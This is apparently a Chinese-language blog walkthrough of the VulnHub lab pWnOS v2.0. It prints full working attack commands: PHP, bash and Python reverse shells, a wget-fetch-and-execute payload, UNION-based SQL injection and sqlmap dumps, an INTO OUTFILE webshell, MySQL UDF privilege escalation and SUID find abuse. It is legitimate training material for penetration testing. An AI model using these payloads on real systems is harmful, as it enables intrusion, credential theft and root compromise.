首页 > 其他分享 >14、pWnOS_v2.0(VulnHub)

14、pWnOS_v2.0(VulnHub)

时间:2024-04-29 22:33:18浏览次数:24  
标签:14 -- pWnOS v2.0 admin mysql php email select

pWnOS_v2.0

一、nmap

靶机ip找不见的自行上网查找解决办法。

image-20240325211612163

image-20240325211835263

image-20240325211843277

image-20240325212012813

二、web渗透

目录爆破

image-20240325215304100

/blog/

image-20240325215347696

whatweb

image-20240326224431373

/search.php

image-20240325224752715

image-20240325224802025

/register.php

qwe
123qwe

image-20240325215048309

点击给定的链接

image-20240325215124592

兔子洞,无法登入?一直卡在这个界面

image-20240325215430125

wfuzz

image-20240325215926292

貌似没什么用

image-20240325215858711

nmap -> 目录

image-20240325220144839

Simple PHP Blog 0.4.0

image-20240325221103488

perl 1191.pl

image-20240325221358483

如果出现运行报错Can't locate Switch.pm in @INC,应该是perl版本依赖未安装的问题,运行sudo apt install libswitch-perl即可。

漏洞利用

没啥效果

image-20240325221939557

创建账号密码

l33t/l33t

主要这边填写的目录信息,只能在/blog目录下,在其他目录下无法生效

image-20240325222322260

成功登入

image-20240325222406142

php文件上传

image-20240325223217312

再次目录爆破找文件上传点

里面的/config/目录是刚刚漏洞执行后留存的,暂时不管他

image-20240325223247163

神奇的是可正常上传php,可正常执行php文件

image-20240325223353867

php反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.20/1234 0>&1'")?>

image-20240325231708471

image-20240325231751835

三、内网渗透

数据库连接的敏感文件

image-20240325231957045

ssh尝试

image-20240325232404172

数据库连接不上?

image-20240325232454131

新的数据库连接的敏感文件

image-20240325232559601

尝试连接本地mysql

如果尝试连接不上本地mysql时,可以尝试添加以下本地当前的会话权限

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240326225512743

image-20240326225654493

存在两条数据,qwe是之前自己创建的,暂时就不看了,我们重点看Dan用户

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | [email protected] | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
|       2 | qwe        | qwe       | [email protected]       | 05fe7461c607c33229772d402505601016a7d0ea |          0 | NULL   | 2024-01-29 17:05:24 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
2 rows in set (0.00 sec)

/etc/passwd

image-20240326230110753

hash-identifier

SHA-1这种以网上找的破解更快速

image-20240326231538439

killerbeesareflying

image-20240326231935104

hydra

image-20240326233912825

hydra就不行了,协议不够多

image-20240326233117494

crackmapexec

image-20240326233056081

ssh的尝试连接

root
ssh [email protected]
root@ISIntS

image-20240325232649656

四、拓展内容

/login.php --sqlmap拿shell

image-20240327083349200

注册后登录会一直显示 "Logging in....",不排除可能有waf这种机制存在,很可能某些操作会被判定为恶意行为然后被block掉

image-20240327083356070

经过测试,发现首页的登录功能,用户名单引号会报错,使用万能密码admin' or '1'#可以登录,该页面存在sql注入。直接使用sqlmap

发现数据

image-20240327083912661

bp -> 数据包 -> sqlmap -> 数据

sqlmap -r sql.txt --batch --random-agent --level=5 --risk=3 --batch -D ch16 -T users --dump

image-20240327084210564

--data -> sqlmap -> 数据

sqlmap -u 'http://10.10.10.100/login.php' --data="email=admin' or '1'#&pass=admin' or '1'#&submit=Login&submitted=TRUE" --level=5 --risk=3 --batch -D ch16 -T users --dump

image-20240327084415715

--os-shell -> sqlmap

直接使用--os-shell,是没有效果的。

image-20240327094420576

--file-write & --file-dest -> sqlmap -> shell

image-20240327091723512

其实我们靶场都已经打完了嘛,最后做一个拓展,那么我们看看文件是否上传成功

image-20240327091829882

完美,成功反弹,可以正常命令执行

image-20240327092023284

--file-write & --file-dest -> shell & get -> sqlmap -> shell

继续学习闲*人博客上的思路,加入存在对文件检测怎么绕过。

//上传shell
sqlmap -u 'http://10.10.10.100/login.php' --data='email=admin&pass=admin&submit=Login' --level=5 --risk=3 --file-write='get2255.php' --file-dest='/var/www/get2255.php'

//shell2255.py
export RHOST="10.10.10.130";export RPORT=2255;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

//get2255.php
<?php system('cd /tmp;wget 10.10.10.130:9000/shell2255.py;chmod +x shell2255.py;./shell2255.py')?>

//开启本地服务器
php -S 0:80

//浏览器执行web根目录下的shell2255.py文件
http://10.10.10.100/shell2255.py

image-20240327093825682

image-20240327093844751

image-20240327093744927

SQLi(手工注入)

<1> 单引号

SELECT * FROM users WHERE email='admin'' AND pass='d033e22ae348aeb5660fc2140aec35850c4da997' AND active IS NULL
得出结论:sql语句大概是select * from users where email='*****' and pass='*****' and ?

image-20240327100440573

<2>尝试构建使得不报错

#注释掉后面的
email=admin'#(不报错)

image-20240327101122557

<3>判断能否恶意修改。

email=admin' or '1'#  (登录成功)
得出结论:sql语句能被恶意修改带入数据库执行

image-20240327101147300

这里编不编码效果差不多,有异常后面尝试看看是不是编码问题。

image-20240327101238613

<4> 枚举,判断数据库查了几列数据用于后面union拿数据

email=admin' union select 1,2,3,4,5,6,7,8 #
email=admin' union select 1,2,3,4,5,6,7,8,9 #

email=admin' union select 1,2,3,database(),5,6,7,8 #
email=admin' union select 1,2,3,user(),5,6,7,8 #
email=admin' union select 1,2,3,@@version,5,6,7,8 #
(回显结果:
database() ch16,
user()  root@localhost)
@@version   5.1.54

只有第四列可用于回显

image-20240327101706127

image-20240327101729766

<5>查库

email=admin' union select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata#
(回显结果: information_schema,ch16,mysql)

image-20240327102603578

<6>查表

email=admin' union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()#
(回显结果:users)

image-20240327102721195

<7>查users表的字段

email=admin' union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database() and table_name='users'#
(回显结果:user_id,first_name,last_name,email,pass,user_level,active,registration_date)

image-20240327102938181

<8>查内容

email=admin' union select 1,2,3,group_concat(concat_ws(':',first_name,last_name,pass,email,pass)),5,6,7,8 from ch16.users#
[email protected]:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
(回显结果:Dan:Privett:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:[email protected]:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af,qwe:qwe:05fe7461c607c33229772d402505601016a7d0ea:[email protected]:05fe7461c607c33229772d402505601016a7d0ea
)
(c2c4b4e51d9e23c02c15702c136c3e950ba9a4af 解密后为 killerbeesareflying)

image-20240327103131646

SQLi 文件读写 --> 反弹shell

<9>读取本地文件

发现可以load_file 读取本地文件

email=admin' union select 1,2,3,load_file('/etc/passwd'),5,6,7,8 #

image-20240327103510109

<10> sqli写木马

/var/www写入文件sqli_shell.php 内容为一句话,需要注意的是所导出的文件名一定要是网站中不存在的,不然也不会成功

email=' union select 1,2,3,"<?php system($_POST['x']);?>",5,6,7,8 into outfile '/var/www/sqli_shell.php'#

报错先不用怕,其实我们已经写入了

image-20240327103953085

<11>验证是否真的成功写入

验证outfile是否成功,发现成功写入

email=admin' union select 1,2,3,load_file('/var/www/sqli_shell.php'),5,6,7,8 #

image-20240327104119819

确实的,我们在靶机上也成功看见这个文件

image-20240327104012125

<12>python反弹shell成功

export RHOST="10.10.10.130";export RPORT=33333;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

image-20240327104511457

UDF 提权

1、确定目标

www-data权限下,发现mysql程序以root身份运行,并发现两个数据库配置文件mysqli_connect.php,其中/var下目录找到的数据库登录凭据是可以成功登录数据库的

ps -ef | grep mysql
cat /var/www/mysqli_connect.php
cat /var/mysqli_connect.php
python -c 'import pty;pty.spawn("/bin/bash")'

image-20240327104951856

2、信息整理

导入导出权限查看(secure_file_priv为空,导入导出文件无限制);mysql架构信息查看(x86_64);plugin目录位置(/usr/lib/mysql/plugin);当前用户权限查看(mysql.func为空则为低权限无法查看)

mysql -uroot -proot@ISIntS
mysql> select @@version;
mysql> show variables like '%plugin%';
mysql> show variables like '%compile%'; 
mysql> select * from mysql.func;

mysql> show global variables like 'secure%';
mysql> show global variables like '%compile%';
//secure_file_priv 为 NULL ,表示限制 mysqld 不允许导入导出文件,此时无法提权
//secure_file_priv 为 /tmp/ ,表示限制 mysqld 的导入导出文件只能发生在 /tmp/ 目录下,此时无法提权
//secure_file_priv 没有值,表示不对 mysqld 的导入导出文件做限制,此时可提权

image-20240327110343194

均未发现以下文件,则看看能否尝试本地上传到靶机

whereis lib_mysqludf_sys.so
whereis lib_mysqludf_sys_32.so
whereis lib_mysqludf_sys_64.so

image-20240327105645628

3、上传udf库

由于靶机中未找到 udf 库,我们可在msf中找到对应版本(lib_mysqludf_sys_64.so)。开启http服务将udf库文件摆渡到靶机上的plugin的目录上。

cd /usr/lib/mysql/plugin
wget http://10.10.10.130/lib_mysqludf_sys_64.so

image-20240327113938418

image-20240327113927950

4、使用udf提权

创建恶意函数sys_eval,利用函数,获得一个root权限。

mysql -u root -proot@ISIntS
mysql> create function sys_eval returns string soname "lib_mysqludf_sys_64.so";
mysql> select sys_eval('whoami');

image-20240327114254544

5、给find命令赋root的suid权限

mysql> select sys_eval('chmod u+s /usr/bin/find');
cd /tmp
find . -exec /bin/sh \;

image-20240327114553411

标签:14,--,pWnOS,v2.0,admin,mysql,php,email,select
From: https://www.cnblogs.com/carmi/p/18166762

相关文章

  • 初中中考阅读理解难题一网打尽!句子结构深度解析+答案揭秘,助你轻松冲刺高分!-014
    PDF格式公众号回复关键字:ZKYDT014原文1DoChineseyoungpeopleliketowatchshowsonmobilephoneswhileeating?解析1Do助动词,Chineseyoungpeople中国年轻人,liketo喜欢,watchshowsonmobilephones看手机上节目,whileeating?吃饭的时候中国年轻人......
  • P1496 火烧赤壁
    题目:火烧赤壁题目背景曹操平定北方以后,公元208年,率领大军南下,进攻刘表。他的人马还没有到荆州,刘表已经病死。他的儿子刘琮听到曹军声势浩大,吓破了胆,先派人求降了。孙权任命周瑜为都督,拨给他三万水军,叫他同刘备协力抵抗曹操。隆冬的十一月,天气突然回暖,刮起了东南风。没想到......
  • p1140 C语言循环数
    #include<stdio.h>#include<stdlib.h>#include<math.h>#include<string.h>#defineN100intmain(){intn,x,y,i,j,p,q,t,s;chara[N]={'0'};while(scanf("%s",&a)!=EOF){intb[N];......
  • 虚拟机VMware tools的用途(转载)[2012.2.14 sina blog]
    虚拟机VMwaretools的用途更新虚拟机中的显卡驱动,使虚拟机中的XWindows可以运行在SVGA模式下。在客户操作系统中安装VMwareTools非常重要。如果不安装VMwareTools,虚拟机中的图形环境被限制为VGA模式图形(640x480,16色)。使用VMwareTools,SVGA驱动程序被安装,VMwareWorkstati......
  • 力扣-1422. 分割字符串的最大得分
    1.题目题目地址(1422.分割字符串的最大得分-力扣(LeetCode))https://leetcode.cn/problems/maximum-score-after-splitting-a-string/?envType=study-plan-v2&envId=primers-list题目描述给你一个由若干0和1组成的字符串s,请你计算并返回将该字符串分割成两个非空子......
  • 算法学习笔记(14):区间最值操作和历史最值问题
    区间最值操作,历史最值问题来源吉老师2016集训队论文,oiwiki,网络上各种博客。概述区间最值操作指的是:将所有的$i\in$\((l,r)\),\(a_i=min或max(a_i,k)\)。历史最值问题指的是:新定义一个数组\(b[]\),\(b[i]=max或min(b[i],a[i])\)。还有一种是历史版本和,即\(......
  • 35K*14 薪,入职了!这公司只要不裁员,我能一直呆下去!
    大家好,我是R哥。说说最近的面试辅导,有个学员进了某个知名互联网公司,拿到了35K*14薪的好成绩,有不少粉丝留言问我,现在行情这么差,他是怎么做到的?这篇拿他这个案例完整回顾一下吧,我管他叫小Y吧。背景沟通说下小Y的基本情况吧:小Y工作5年+,空窗期2个月+,5年干了3家单位,学历不......
  • [Err]1114 The table 'xxx' is full 的解决办法
    错误信息[ERR]1114-Thetable'th_exam_paper'isfull解决步骤查看服务器硬盘使用情况df-h数据库所在位置空间已经百分之一百,准备迁移数据库文件迁移mysql数据库文件到挂载盘要将MySQL数据库文件迁移到其他挂载盘,你需要做的是将数据文件复制到新位置,并更新MyS......
  • P3920 WC2014 紫荆花之恋
    P3920WC2014紫荆花之恋毒瘤题目,动态点分树。前置科技点替罪羊树高速平衡树(除去fhq_treap和splay之外的所有平衡树)约定\(dis(u,v)\)为原树上\(u,v\)两点间的距离\(siz\)为子树大小思路维护一棵可以动态插入节点的点分树,有点权和边权,求任意两点点权和大于两点......
  • Python 潮流周刊#48:Python 3.14 的发布计划
    本周刊由Python猫出品,精心筛选国内外的250+信息源,为你挑选最值得分享的文章、教程、开源项目、软件工具、播客和视频、热门话题等内容。愿景:帮助所有读者精进Python技术,并增长职业和副业的收入。本期分享了12篇文章,11个开源项目,赠书5本《图解TCP/IP(第6版)》,以下是周刊......